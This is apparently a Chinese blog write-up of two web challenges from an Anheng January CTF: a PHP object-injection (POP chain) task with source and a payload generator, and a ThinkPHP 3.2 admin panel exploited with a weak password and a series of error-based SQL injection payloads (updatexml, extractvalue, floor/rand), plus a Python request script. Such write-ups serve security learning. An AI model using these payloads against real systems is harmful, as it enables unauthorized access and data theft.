安恒1月月赛

安恒1月月赛复现wp

Web

babygo

​ babygo(提交你找到的字符串的md5值)

题目源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
<?php  
@error_reporting(1);
include 'flag.php';
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new sec;
}
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}

class cool
{
public $filename;
public $nice;
public $amzing;
function read()
{
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}

class sec
{
function read()
{
return "it's so sec~~";
}
}

if (isset($_GET['data']))
{
$Input_data = unserialize($_GET['data']);
echo $Input_data;
}
else
{
highlight_file("./index.php");
}
?>

感觉是一叶飘零师傅出的题2333…还是学习到了一点知识的

这题考查的就是 PHP 对象注入,@l3m0n 师傅这篇写的比较好,其他 csdn 的博客写的简直惨不忍睹,php对象注入-pop链的构造,其实关键点就是反序列化可以控制类属性,无论是private还是public。我们可以在本地先生成自己需要的就好了

如下,直接把__construct方法里面的改成$this->skyobj = new cool;就可以调用 cool->read()了,然后直接用$this->amazing = NULL;绕过$this->nice->aaa === $this->nice->bbb,其实不传也可以,反正都是NULL,整个题就结束了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
<?php  
// @error_reporting(1);
// include 'flag.php';
class baby
{
protected $skyobj;
public $aaa;
public $bbb;
function __construct()
{
$this->skyobj = new cool;
$this->amazing = NULL;
}
function __toString()
{
if (isset($this->skyobj))
return $this->skyobj->read();
}
}

class cool
{
public $filename = "flag.php";
public $nice;
public $amzing;
function read()
{
echo "Nice!";
$this->nice = unserialize($this->amzing);
$this->nice->aaa = $sth;
if($this->nice->aaa === $this->nice->bbb)
{
$file = "./{$this->filename}";
if (file_get_contents($file))
{
return file_get_contents($file);
}
else
{
return "you must be joking!";
}
}
}
}

class sec
{
function read()
{
return "it's so sec~~";
}
}

$obj = new baby;
echo urlencode(serialize($obj));
// $obj->aaa->amazing = new baby;

// if (isset($_GET['data']))
// {
// $Input_data = unserialize($_GET['data']);
// echo $Input_data;
// }
// else
// {
// highlight_file("./test.php");
// }
?>

Simple php

访问robots.txt发现有后台

1
2
3
4
5
6
User-agent: *

Disallow: /ebooks
Disallow: /admin
Disallow: /xhtml/?
Disallow: /center

访问admin,使用admin/12345678成功登录,登录后有一个搜索功能

结合页面thinkphp 3.2的框架漏洞,使用以下 payload 逐渐获得 flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
search[where]=3 and 1=updatexml(1,concat(0x7,(select schema_name from information_schema.schemata limit 3,1),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select group_concat(table_name) from information_schema.tables where table_schema='tpctf'),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select group_concat(flag) from flag),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x7,(select flag from flag limit 0,1),0x7e),1);%23

search[where]=3 and 1=updatexml(1,concat(0x3a,(select flag from flag limit 0,1)),1);%23

search[where]=3 and extractvalue(1,concat(0x5c,(select flag from flag limit 0,1)));%23

search[where]=3 and (select 1 from (select count(),concat((select (select (select flag from flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a);%23


search[where]=3 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7,flag,0x7e) FROM flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);%23

select 1 from(select count(*),concat((select (select (SELECT concat(0x7,flag,0x7e) FROM flag limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a

结果发现提交不对,然后看了其他师傅的 wp 发现少了一位,然后搜了一下相关资料,应该是限制了输出

尝试了很多,也用了floor尝试报错注入不限制输出,但是用floor本地成功了,但是一打服务就 pending 了,很是郁闷,最后用substr(str,32,1)得到了最后的一个数6

1
search[where]=3 and extractvalue(1,concat(0x5c,substr((select flag from flag limit 0,1),32,1)));%23

贴一下脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import HackRequests as hack
url = "http://101.71.29.5:10010/Admin/User/Index?search[where]=3%20and%20extractvalue(1,concat(0x5c,substr((select%20flag%20from%20flag%20limit%200,1),32,1)));%23"
loginurl = "http://101.71.29.5:10010/admin/index/login"
# hh = hack.httpraw(raw)
header = '''
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Cookie: PHPSESSID=6qm8l5phgs6hkva4fpndkp1p70; path=/
'''
proxy = ('185.32.44.22','80')
user = "user=admin&password=12345678"
# hh = hack.http(loginurl,headers=header,proxy=proxy,post=user)
hh = hack.http(url,headers=header,proxy=proxy)
print(hh.header)
print(hh.text())

顺便提一下,这个登录我看其他师傅 wp 是通过 sql 约束攻击登录 admin 账户的…并非弱口令,我猜 sql 语句应该是

1
select * from users where username = "xxx" and passowrd = "xxx"

而且注册密码是8位数的话,肯定应该有师傅是弄的 12345678 …2333

Flutter packages get 424问题解决方法 Hackim-2019 Web 记录

Comments

Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×